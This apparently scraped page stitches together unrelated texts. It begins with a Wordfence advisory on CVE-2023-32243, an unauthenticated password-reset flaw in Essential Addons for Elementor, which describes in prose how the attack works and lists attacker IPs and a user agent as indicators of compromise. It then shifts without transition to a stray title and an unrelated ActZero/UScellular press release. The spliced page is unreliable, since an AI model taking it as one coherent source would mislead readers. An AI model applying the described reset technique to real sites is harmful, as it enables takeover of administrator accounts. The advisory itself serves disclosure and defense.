join the conversation. Or you can read the full post in this email.READ THIS POST ON THE BLOGVulnerability DetailsDescription: Essential Addons for Elementor <= 5.7.1 – Unauthenticated Arbitrary Password Reset to Privilege Escalation Affected Plugin: Essential Addons for Elementor Plugin Slug: essential-addons-for-elementor-liteAffected Versions: <= 5.7.1CVE ID: CVE-2023-32243CVSS Score: 9.8 (Critical)CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:HResearcher/s: Rafie Muhammed Fully Patched Version: 5.7.2The vulnerability patched in Essential Addons for Elementor allowed for attackers to reset passwords for arbitrary accounts on any of the one million WordPress sites running the plugin. This was due to the fact that the reset_password function did not adequately validate a password reset request with a password reset key, so attackers could simply supply a valid username, obtain a valid nonce from the site’s homepage, input random data for the remaining fields, and reset the supplied users password to whatever they chose in one simple request.WordPress doesn’t consider usernames to be sensitive information which means attackers can easily enumerate a site looking for valid usernames. Additionally, site owners often forget to change the default username making it possible for attackers to use common default usernames such as ‘admin.’ This makes it much easier for attackers to uncover valid accounts that they can compromise in order to elevate their privileges on the site. Once the attacker is logged in as an administrator, they have free rein to perform actions like installing plugins and backdoors to further infect the site, server, and any unsuspecting visitors.A Look at the Attack DataPlugin Discovery ProbingThe first interesting trend we noticed is that immediately following the disclosure of the vulnerability on May 11, 2023 readme.txt probing attempts for Essential Addons for Elementor immediately spiked and remained relatively higher than normal over the course of a few days. While there are services that probe installation data for legitimate purposes, we believe this data indicates that attackers began looking for vulnerable sites as soon as the vulnerability was disclosed. Over 5,000,000 readme.txt probs were made just the day after disclosure.readmeprob Top Offending IP Addresses Engaging in Discoveryreadmeprobip Top Offending IP Addresses And Total Number of Exploits BlockedIn the past 5 days, we have blocked over 6,900 attacks with the top attacking IP being 78.128.60.112. We have also detected and blocked a few hundred exploit attempts utilizing the exploit that was released two days ago. Again, our data is limited due to the nature of the WAF rule, however, it’s worth noting that all of the 6,900 requests we blocked would have likely led to site compromises if they did not have Wordfence Premium installed.exploitattempts Indicators of CompromiseOne obvious sign of infection is if a site’s administrator is unable to log in with the correct password as it may have been changed as a result of this vulnerability, and the site is running Essential Addons for Elementor version 5.7.1 or older. We also recommend checking for newly added malicious administrators, as these may have been added to maintain persistence.We have begun tracking infections on sites running a vulnerable version of the plugin, and though no clear pattern has yet emerged, sites running outdated versions of the plugin were already at significantly higher risk of infection than our average user.User Agents- The public exploit uses the following User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299Look for requests in a site’s access log with the following originating IP Addresses:- 78.128.60.112- 23.224.195.51- 212.113.119.6- 193.233.232.243- 91.193.43.151- 51.77.200.137- 2a0e:d602:1:4c8::2- 103.187.5.198- 2a0e:d602:1:bae::2- 103.149.137.18ConclusionIn today’s article, we covered a Critical-severity vulnerability in Essential Addons for Elementor that allows attackers to easily take over websites by resetting the password of any user, including administrators. We have begun tracking attack data for this vulnerability and expect attacks to ramp up as the vulnerability is trivial to exploit, has a wide install base, and is highly impactful, making it incredibly attractive to attackers.Wordfence Premium, Care, and Response customers received protection against this vulnerability via a firewall rule on May 11, 2023, and Wordfence free users will receive the same protection 30 days later on June 20, 2023.Even if you have already received a firewall rule for this issue we urge you to ensure that your site is updated to at least version 5.7.2 in order to maintain normal functionality, as this vulnerability is severe. If you have friends or colleagues running Essential Addons for Elementor, be sure to forward this advisory to them, as hundreds of thousands of sites still remain unprotected and unpatched.If you believe your site has been compromised as a result of this vulnerability or any other vulnerability, we offer Incident Response services via Wordfence Care. If you need your site cleaned immediately, Wordfence Response offers the same service with 24/7/365 availability and a 1-hour response time. Both these products include hands-on support in case you need further assistance.If you are a security researcher, you can responsibly disclose your finds to us and obtain a CVE ID and get your name on the Wordfence Intelligence leaderboard. I’d like to say a special thank you to my colleague Ramuel Gall, Senior Security Researcher at Wordfence, for his assistance on this research and post.

WordPress Elementor Lite 5.7.1 Arbitrary Password Reset

AI-powered cyber defense service protects against phishing attacks for businesses on unlimited handset plans.

**SAN FRANCISCO****,** **May 17, 2023** **/PRNewswire/ --** ActZero®, a leading cybersecurity provider for small and mid-sized enterprises, announced it is teaming with UScellular, making it the first and only wireless carrier to offer the ActZero Managed Detection and Response (MDR) service. Together the two organizations make it easier for businesses to secure mobile devices from ransomware and phishing attacks. UScellular Business Ultimate and Business Premium unlimited handset plans now include ActZero MDR for Mobile.

"UScellular and ActZero share a common goal: to bring better performance and better security to businesses at a fair price," said Sameer Bhalotra, chief executive officer for ActZero. "With ActZero's on-device cyberdefense technology plus 24x7 security operations staff, UScellular business customers can stop mobile threats quickly, before they spread into the corporate network."

With 24/7 threat coverage, ActZero stops breaches on mobile devices and networks, with a 90% block rate and response time of 15 minutes for critical alerts. Customers can easily deploy ActZero MDR for Mobile within minutes to their employees' iOS, Android, or Chrome mobile phones, tablets, and laptops. On-device protection and real-time notifications eliminate delays if a mobile device is compromised. ActZero's patent-pending AI means better cyberdefense and fewer false alarms.

"ActZero delivers a powerful and affordable cybersecurity service businesses need to prioritize threat and vulnerability management," said Kim Kerr, senior vice president, enterprise sales and operations for UScellular. "Our customers often don't have the IT resources to ensure they are protecting their network and devices from malware, phishing, and ransomware attacks. The unique artificial intelligence and machine learning from ActZero intelligently pinpoints threats so less time is spent filtering noise and more time is focused on the action that should be taken, when it's truly important."

**About ActZero**

ActZero is a Gartner-recognized provider of Managed Detection and Response (MDR) services that delivers a powerful and affordable cybersecurity service to protect small and mid-sized enterprises against ransomware attacks. By continuously testing defenses against the latest attack techniques and variants, ActZero ensures AI detections and human threat hunters quickly stop threats. The company brings deep roots and expertise in cybersecurity to deliver measurable ransomware defense, reducing false alerts and responding quickly on a customer's behalf. Combined with exceptional service, ActZero empowers businesses with confidence that the company and customers are protected. For more information, please visit actzero.com.

**About UScellular Business** 

UScellular is the fourth-largest full-service wireless carrier in the United States, providing national network coverage and industry-leading innovations designed to elevate the customer experience. The Chicago\-based carrier provides a strong, reliable network supported by the latest technology and plays a critical role in helping businesses of all sizes navigate the wireless ecosystem, delivering advanced technology, increased network security and reliability. To learn more about UScellular's business solutions, visit one of its retail stores or uscellular.com/business.

Tag

#intel